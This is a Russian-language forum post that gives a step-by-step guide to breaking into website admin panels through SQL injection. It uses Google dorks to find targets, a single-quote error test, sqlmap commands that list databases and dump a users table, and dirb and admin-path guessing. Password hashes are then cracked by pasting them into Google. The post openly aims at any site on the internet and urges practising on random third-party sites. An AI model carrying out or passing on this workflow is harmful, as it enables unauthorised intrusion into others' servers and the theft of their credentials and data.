СиБ |
Дата: Пятница, 05.01.2018, 12:30 | Сообщение # 1 |
Сообщений: 170
|
Предполагается, что целью читателя является получение доступа к админ-панели любого сайта, находящегося в сети Интернет, у читателя имеется на рабочей машине Kali Linux. Ниже я расскажу способ как взломать именно тот сайт, который Вам нужен, имея минимум знаний.
Итак, приступим. Если Вам нужно прокачать скилы в пентесте с нуля, первым делом в гугле вбиваем следующее:
<code>"google dorks 2017 sqli"
Ткнув мышью в первую понравившуюся ссылку мы увидим нечто следующее:
inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl lay_old.php?id= inurl:declaration_more.php?decl_id= inurl ageid= inurl:games.php?id= inurl age.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id=
Скопируйте одну из строк в новую вкладку с гуглом, и вставьте её в поле запроса. Результатом запроса будут сайты, в URL`ах которых присутвуют символы, написанные после inurl:. Открыв произвольный сайт из списка жмём в поле браузера для ввода URL, и в конце адреса ставим одинарную кавычку "'" и жмём Enter.
Пример: site.com/readnews.php?id=23'
В результате, на странице мы должны увидеть следующее:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Важно увидеть именно MySQL ошибку, а не PHP!!! Если Вы после ввода кавычки не увидели в сообщение об ошибке слова MySQL или вообще ни чего не увидели, то либо пробуйте следующий приём:
Пример: site.com/readnews.php?id[]=23
Либо переходите к следующему сайту. Итак, увидев подобную ошибку на странице тестируемого сайта необходимо скопировать адрес страницы БЕЗ кавычки или КВАДРАТНЫХ СКОБОК. Затем открыть консоль и ввести в ней следующее:
sqlmap -u site.com/readnews.php?id=23 --random-agent -f --dbs
Эта комадна позволит Вам получить имена баз данных этого сайта. Во второй вкладке или окне консоли вводим другую команду:
dirb http://site.com/readnews.php?id=23
Эта команда позволит Вам найти скрытые файлы и папки этого сайта. Пока ждём результатов работы программ, можно в ручную попробовать найти вместо dirb`a админку самостоятельно. для этого после site.com/ вводим: /admin /admin.php /login /login.php /phpmyadmin /webadmin
Отлично, мы нашли страницу http://site.com/admin в которой имеется поле для ввода Логина и Пароля. Переходим в консоль, и смотрим на результат работы программы Sqlmap. Прекрасно, у нас имеется две базы данных:
information_schema baza_eu
Вводим в консоле команду, которая позволит нам получить список таблиц базы данных baza_eu:
sqlmap -u site.com/readnews.php?id=23 --random-agent -f -D baza_eu --tables
После того, как скрипт выполнит свою работу, что-то похожее на это:
+--------------------------------+ | contact_people | | tbl_pages | | tbl_privileges | | tbl_submenu | | tbl_tools | | tbl_tools_vars | | tbl_users | +--------------------------------+
Нас интересуют логин и пароль от админки, следовательно мы ищем его в таблице tbl_users. Вводи следующее:
sqlmap -u site.com/readnews.php?id=23 --random-agent -f -D baza_eu -T tbl_users --dump
Программа предложит брутить хеши предложенных паролей на компе, необходимо отказаться от этого рази экономии времени (ну или можете соглашаться на все предложения программы, например на вопрос do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] ввести N). После этого вы получите список логинов и хешей паролей:
+----+----------+-------------------------------------------------------+ | id | username | password | +----+---------+---------------------------------------------------------+ | 1 | admin | aba14f4d76e2d4350e2e164a5b49c788 | | 5 | user10 | dea9ddb25cbf2352cf4dec30222a02a5 | | 7 | user20 | bf23471d96d9cb4abf4965603136f98b | +----+----------+-------------------------------------------------------+
Мы получили заветные символы, однако в колоке password находятся отнюдь не пароли, а хеш, который можно конечно же и сбрутить. Но мы понадеемся на удачу и пойдём хитрым путём. Копируем хеш пароля и вставляем его в гугл. Вуаля, в первой ссылке на против нашего хеша мы находим 1528mads .Вставляем admin в поле логина и 1528mads в поле пароля и имеем счастье. Тварить можете с ним всё, что позволяет Вам админ-панель =) Если у Вас есть проблемы с использованием вышеописанных программ советую обратиться к Гуглу.
В случае если Вам нужно получить доступ к админке определённого сайта http://site.com/ необходимо открыть программу OWASP и в центральный фрейм ввести небходимый Вам URL сайта. После 10-20 минут сканирования, внизу во вкладке "Оповещения" Вы найдёте кнопку с подписью "Sql-инъекция" и красным флажком. Далее необходимо скопировать уязвимую ссылку и провести вышеописанные действия. Удачи!!! З\Ы Если не получается тот самый сайт то прокачивайте скилл на других сайтах
Прочитал? Красавчик
|
|
|